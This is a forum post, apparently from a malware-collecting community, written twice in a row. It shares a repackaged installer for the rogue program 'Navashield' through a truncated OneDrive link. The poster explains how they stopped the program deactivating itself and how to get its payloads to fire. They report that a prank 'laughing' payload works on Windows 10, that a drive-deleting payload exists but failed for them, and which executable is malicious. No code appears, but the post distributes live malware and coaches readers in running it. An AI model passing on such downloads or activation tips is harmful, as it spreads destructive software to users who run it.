Hi,
The rogue "Navashield", as you know, does not work anymore as it gets the trial key from navashield.com and the website has been deleted.
However, I found a forum where dannooct1 uploaded his xp vm with it installed. So i copied the installation folder, deleted navaupdate as that deactivates navashield for some reason, and made an installer.
Make sure you are connected to the internet when running it, as even though the servers are gone, it still doesn't work when not connected.
Occasionally it will deactivate itself, just run navashield.exe.
No need to change the date or time for the payload. just wait 5 minutes.
I couldn't get the deleting drive c payload to work, but the laughing payload works fine.
I also found that Navadebugger.exe is the malicious exe that does all the laughing.
This still works fine on windows 10.
Onedrive: https://onedrive.live.com/redir?resid=C ... =folder%2c
attachments wouldn't work for some reason.
The rogue "Navashield", as you know, does not work anymore as it gets the trial key from navashield.com and the website has been deleted.
However, I found a forum where dannooct1 uploaded his xp vm with it installed. So i copied the installation folder, deleted navaupdate as that deactivates navashield for some reason, and made an installer.
Make sure you are connected to the internet when running it, as even though the servers are gone, it still doesn't work when not connected.
Occasionally it will deactivate itself, just run navashield.exe.
No need to change the date or time for the payload. just wait 5 minutes.
I couldn't get the deleting drive c payload to work, but the laughing payload works fine.
I also found that Navadebugger.exe is the malicious exe that does all the laughing.
This still works fine on windows 10.
Onedrive: https://onedrive.live.com/redir?resid=C ... =folder%2c
attachments wouldn't work for some reason.
